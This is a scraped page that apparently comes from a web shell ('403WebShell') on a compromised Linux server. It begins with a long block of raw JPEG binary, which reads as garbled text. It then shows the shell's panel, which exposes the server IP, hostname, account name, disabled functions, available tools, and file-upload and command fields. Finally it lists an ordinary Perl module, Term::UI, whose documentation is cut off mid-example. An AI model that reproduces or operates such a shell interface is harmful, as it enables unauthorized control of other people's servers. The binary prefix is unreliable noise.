JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 173.199.190.172  /  Your IP : 216.73.216.167
Web Server : Apache
System : Linux chs1.nescrow.com.ng 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : oysipaoygov ( 1026)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/perl5/vendor_perl/Term/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/perl5/vendor_perl/Term/UI.pm
package Term::UI;

use if $] > 5.017, 'deprecate';

use Carp;
use Params::Check qw[check allow];
use Term::ReadLine;
use Locale::Maketext::Simple Style => 'gettext';
use Term::UI::History;

use strict;

BEGIN {
    use vars        qw[$VERSION $AUTOREPLY $VERBOSE $INVALID];
    $VERBOSE    =   1;
    $VERSION    =   '0.36';
    $INVALID    =   loc('Invalid selection, please try again: ');
}

push @Term::ReadLine::Stub::ISA, __PACKAGE__
        unless grep { $_ eq __PACKAGE__ } @Term::ReadLine::Stub::ISA;


=pod

=head1 NAME

Term::UI - Term::ReadLine UI made easy

=head1 SYNOPSIS

    use Term::UI;
    use Term::ReadLine;

    my $term = Term::ReadLine->new('brand');

    my $reply = $term->get_reply(
                    prompt => 'What is your favourite colour?',
                    choices => [qw|blue red green|],
                    default => 'blue',
    );

    my $bool = $term->ask_yn(
                        prompt => 'Do you like cookies?',
                        default => 'y',
                );


    my $string = q[some_command -option --no-foo --quux='this thing'];

    my ($options,$munged_input) = $term->parse_options($string);


    ### don't have Term::UI issue warnings -- default is '1'
    $Term::UI::VERBOSE = 0;

    ### always pick the default (good for non-interactive terms)
    ### -- default is '0'
    $Term::UI::AUTOREPLY = 1;

    ### Retrieve the entire session as a printable string:
    $hist = Term::UI::History->history_as_string;
    $hist = $term->history_as_string;

=head1 DESCRIPTION

C<Term::UI> is a transparent way of eliminating the overhead of having
to format a question and then validate the reply, informing the user
if the answer was not proper and re-issuing the question.

Simply give it the question you want to ask, optionally with choices
the user can pick from and a default and C<Term::UI> will DWYM.

For asking a yes or no question, there's even a shortcut.

=head1 HOW IT WORKS

C<Term::UI> places itself at the back of the C<Term::ReadLine>
C<@ISA> array, so you can call its functions through your term object.

C<Term::UI> uses C<Term::UI::History> to record all interactions
with the commandline. You can retrieve this history, or alter
the filehandle the interaction is printed to. See the
C<Term::UI::History> manpage or the C<SYNOPSIS> for details.

=head1 METHODS

=head2 $reply = $term->get_reply( prompt => 'question?', [choices => \@list, default => $list[0], multi => BOOL, print_me => "extra text to print & record", allow => $ref] );

C<get_reply> asks a user a question, and then returns the reply to the
caller. If the answer is invalid (more on that below), the question will
be reposed, until a satisfactory answer has been entered.

You have the option of providing a list of choices the user can pick from
using the C<choices> argument. If the answer is not in the list of choices
presented, the question will be reposed.

If you provide a C<default>  answer, this will be returned when either
C<$AUTOREPLY> is set to true, (see the C<GLOBAL VARIABLES> section further
below), or when the user just hits C<enter>.

You can indicate that the user is allowed to enter multiple answers by
toggling the C<multi> flag. Note that a list of answers will then be
returned to you, rather than a simple string.

By specifying an C<allow> handler, you can yourself validate the answer
a user gives. This can be any of the types that the Params::Check C<allow>
function allows, so please refer to that manpage for details.

Finally, you have the option of adding a C<print_me> argument, which is
simply printed before the prompt. It's printed to the same file handle
as the rest of the questions, so you can use this to keep track of a
full session of Q&A with the user, and retrieve it later using the
C<< Term::UI->history_as_string >> function.

See the C<EXAMPLES> section for samples of how to use this function.

=cut

sub get_reply {
    my $term = shift;
    my %hash = @_;

    my $tmpl = {
        default     => { default => undef,  strict_type => 1 },
        prompt      => { default => '',     strict_type => 1, required => 1 },
        choices     => { default => [],     strict_type => 1 },
        multi       => { default => 0,      allow => [0, 1] },
        allow       => { default => qr/.*/ },
        print_me    => { default => '',     strict_type => 1 },
    };

    my $args = check( $tmpl, \%hash, $VERBOSE )
                or ( carp( loc(q[Could not parse arguments]) ), return );


    ### add this to the prompt to indicate the default
    ### answer to the question if there is one.
    my $prompt_add;

    ### if you supplied several choices to pick from,
    ### we'll print them separately before the prompt
    if( @{$args->{choices}} ) {
        my $i;

        for my $choice ( @{$args->{choices}} ) {
            $i++;   # the answer counter -- but humans start counting
                    # at 1 :D

            ### so this choice is the default? add it to 'prompt_add'
            ### so we can construct a "foo? [DIGIT]" type prompt
            $prompt_add = $i if (defined $args->{default} and $choice eq $args->{default});

            ### create a "DIGIT> choice" type line
            $args->{print_me} .= sprintf "\n%3s> %-s", $i, $choice;
        }

        ### we listed some choices -- add another newline for
        ### pretty printing
        $args->{print_me} .= "\n" if $i;

        ### allowable answers are now equal to the choices listed
        $args->{allow} = $args->{choices};

    ### no choices, but a default? set 'prompt_add' to the default
    ### to construct a 'foo? [DEFAULT]' type prompt
    } elsif ( defined $args->{default} ) {
        $prompt_add = $args->{default};
    }

    ### we set up the defaults, prompts etc, dispatch to the readline call
    return $term->_tt_readline( %$args, prompt_add => $prompt_add );

}

=head2 $bool = $term->ask_yn( prompt => "your question", [default => (y|1,n|0), print_me => "extra text to print & record"] )

Asks a simple C<yes> or C<no> question to the user, returning a boolean
indicating C<true> or C<false> to the caller.

The C<default> answer will automatically returned, if the user hits
C<enter> or if C<$AUTOREPLY> is set to true. See the C<GLOBAL VARIABLES>
section further below.

Also, you have the option of adding a C<print_me> argument, which is
simply printed before the prompt. It's printed to the same file handle
as the rest of the questions, so you can use this to keep track of a
full session of Q&A with the user, and retrieve it later using the
C<< Term::UI->history_as_string >> function.


See the C<EXAMPLES> section for samples of how to use this function.

=cut

sub ask_yn {
    my $term = shift;
    my %hash = @_;

    my $tmpl = {
        default     => { default => undef, allow => [qw|0 1 y n|],
                                                            strict_type => 1 },
        prompt      => { default => '', required => 1,      strict_type => 1 },
        print_me    => { default => '',                     strict_type => 1 },
        multi       => { default => 0,                      no_override => 1 },
        choices     => { default => [qw|y n|],              no_override => 1 },
        allow       => { default => [qr/^y(?:es)?$/i, qr/^n(?:o)?$/i],
                         no_override => 1
                       },
    };

    my $args = check( $tmpl, \%hash, $VERBOSE ) or return undef;

    ### uppercase the default choice, if there is one, to be added
    ### to the prompt in a 'foo? [Y/n]' type style.
    my $prompt_add;
    {   my @list = @{$args->{choices}};
        if( defined $args->{default} ) {

            ### if you supplied the default as a boolean, rather than y/n
            ### transform it to a y/n now
            $args->{default} = $args->{default} =~ /\d/
                                ? { 0 => 'n', 1 => 'y' }->{ $args->{default} }
                                : $args->{default};

            @list = map { lc $args->{default} eq lc $_
                                ? uc $args->{default}
                                : $_
                    } @list;
        }

        $prompt_add .= join("/", @list);
    }

    my $rv = $term->_tt_readline( %$args, prompt_add => $prompt_add );

    return $rv =~ /^y/i ? 1 : 0;
}



sub _tt_readline {
    my $term = shift;
    my %hash = @_;

    local $Params::Check::VERBOSE = 0;  # why is this?
    local $| = 1;                       # print ASAP


    my ($default, $prompt, $choices, $multi, $allow, $prompt_add, $print_me);
    my $tmpl = {
        default     => { default => undef,  strict_type => 1,
                            store => \$default },
        prompt      => { default => '',     strict_type => 1, required => 1,
                            store => \$prompt },
        choices     => { default => [],     strict_type => 1,
                            store => \$choices },
        multi       => { default => 0,      allow => [0, 1], store => \$multi },
        allow       => { default => qr/.*/, store => \$allow, },
        prompt_add  => { default => '',     store => \$prompt_add },
        print_me    => { default => '',     store => \$print_me },
    };

    check( $tmpl, \%hash, $VERBOSE ) or return;

    ### prompts for Term::ReadLine can't be longer than one line, or
    ### it can display wonky on some terminals.
    history( $print_me ) if $print_me;


    if ($prompt_add) {
        ### we might have to add a default value to the prompt, to
        ### show the user what will be picked by default:
        $prompt .= " [$prompt_add]: " ;
    }
    else {
        $prompt .= " : ";
    }


    ### are we in autoreply mode?
    if ($AUTOREPLY) {

        ### you used autoreply, but didn't provide a default!
        carp loc(
            q[You have '%1' set to true, but did not provide a default!],
            '$AUTOREPLY'
        ) if( !defined $default && $VERBOSE);

        ### print it out for visual feedback
        history( join ' ', grep { defined } $prompt, $default );

        ### and return the default
        return $default;
    }


    ### so, no AUTOREPLY, let's see what the user will answer
    LOOP: {

        ### annoying bug in T::R::Perl that mucks up lines with a \n
        ### in them; So split by \n, save the last line as the prompt
        ### and just print the rest
        {   my @lines   = split "\n", $prompt;
            $prompt     = pop @lines;

            history( "$_\n" ) for @lines;
        }

        ### pose the question
        my $answer  = $term->readline($prompt);
        $answer     = $default unless length $answer;

        $term->addhistory( $answer ) if length $answer;

        ### add both prompt and answer to the history
        history( "$prompt $answer", 0 );

        ### if we're allowed to give multiple answers, split
        ### the answer on whitespace
        my @answers = $multi ? split(/\s+/, $answer) : $answer;

        ### the return value list
        my @rv;

        if( @$choices ) {

            for my $answer (@answers) {

                ### a digit implies a multiple choice question,
                ### a non-digit is an open answer
                if( $answer =~ /\D/ ) {
                    push @rv, $answer if allow( $answer, $allow );
                } else {

                    ### remember, the answer digits are +1 compared to
                    ### the choices, because humans want to start counting
                    ### at 1, not at 0
                    push @rv, $choices->[ $answer - 1 ]
                        if $answer > 0 && defined $choices->[ $answer - 1];
                }
            }

        ### no fixed list of choices.. just check if the answers
        ### (or otherwise the default!) pass the allow handler
        } else {
            push @rv, grep { allow( $_, $allow ) }
                        scalar @answers ? @answers : ($default);
        }

        ### if not all the answers made it to the return value list,
        ### at least one of them was an invalid answer -- make the
        ### user do it again
        if( (@rv != @answers) or
            (scalar(@$choices) and not scalar(@answers))
        ) {
            $prompt = $INVALID;
            $prompt .= "[$prompt_add] " if $prompt_add;
            redo LOOP;

        ### otherwise just return the answer, or answers, depending
        ### on the multi setting
        } else {
            return $multi ? @rv : $rv[0];
        }
    }
}

=head2 ($opts, $munged) = $term->parse_options( STRING );

C<parse_options> will convert all options given from an input string
to a hash reference. If called in list context it will also return
the part of the input string that it found no options in.

Consider this example:

    my $str =   q[command --no-foo --baz --bar=0 --quux=bleh ] .
                q[--option="some'thing" -one-dash -single=blah' arg];

    my ($options,$munged) =  $term->parse_options($str);

    ### $options would contain: ###
    $options = {
                'foo'       => 0,
                'bar'       => 0,
                'one-dash'  => 1,
                'baz'       => 1,
                'quux'      => 'bleh',
                'single'    => 'blah\'',
                'option'    => 'some\'thing'
    };

    ### and this is the munged version of the input string,
    ### ie what's left of the input minus the options
    $munged = 'command arg';

As you can see, you can either use a single or a double C<-> to
indicate an option.
If you prefix an option with C<no-> and do not give it a value, it
will be set to 0.
If it has no prefix and no value, it will be set to 1.
Otherwise, it will be set to its value. Note also that it can deal
fine with single/double quoting issues.

=cut

sub parse_options {
    my $term    = shift;
    my $input   = shift;

    my $return = {};

    ### there's probably a more elegant way to do this... ###
    while ( $input =~ s/(?:^|\s+)--?([-\w]+=("|').+?\2)(?=\Z|\s+)//  or
            $input =~ s/(?:^|\s+)--?([-\w]+=\S+)(?=\Z|\s+)//         or
            $input =~ s/(?:^|\s+)--?([-\w]+)(?=\Z|\s+)//
    ) {
        my $match = $1;

        if( $match =~ /^([-\w]+)=("|')(.+?)\2$/ ) {
            $return->{$1} = $3;

        } elsif( $match =~ /^([-\w]+)=(\S+)$/ ) {
            $return->{$1} = $2;

        } elsif( $match =~ /^no-?([-\w]+)$/i ) {
            $return->{$1} = 0;

        } elsif ( $match =~ /^([-\w]+)$/ ) {
            $return->{$1} = 1;

        } else {
            carp(loc(q[I do not understand option "%1"\n], $match)) if $VERBOSE;
        }
    }

    return wantarray ? ($return,$input) : $return;
}

=head2 $str = $term->history_as_string

Convenience wrapper around C<< Term::UI::History->history_as_string >>.

Consult the C<Term::UI::History> man page for details.

=cut

sub history_as_string { return Term::UI::History->history_as_string };

1;

=head1 GLOBAL VARIABLES

The behaviour of Term::UI can be altered by changing the following
global variables:

=head2 $Term::UI::VERBOSE

This controls whether Term::UI will issue warnings and explanations
as to why certain things may have failed. If you set it to 0,
Term::UI will not output any warnings.
The default is 1;

=head2 $Term::UI::AUTOREPLY

This will make every question be answered by the default, and warn if
there was no default provided. This is particularly useful if your
program is run in non-interactive mode.
The default is 0;

=head2 $Term::UI::INVALID

This holds the string that will be printed when the user makes an
invalid choice.
You can override this string from your program if you, for example,
wish to do localization.
The default is C<Invalid selection, please try again: >

=head2 $Term::UI::History::HISTORY_FH

This is the filehandle all the print statements from this module
are being sent to. Please consult the C<Term::UI::History> manpage
for details.

This defaults to C<*STDOUT>.

=head1 EXAMPLES

=head2 Basic get_reply sample

    ### ask a user (with an open question) for their favourite colour
    $reply = $term->get_reply( prompt => 'Your favourite colour? );

which would look like:

    Your favourite colour?

and C<$reply> would hold the text the user typed.

=head2 get_reply with choices

    ### now provide a list of choices, so the user has to pick one
    $reply = $term->get_reply(
                prompt  => 'Your favourite colour?',
                choices => [qw|red green blue|] );

which would look like:

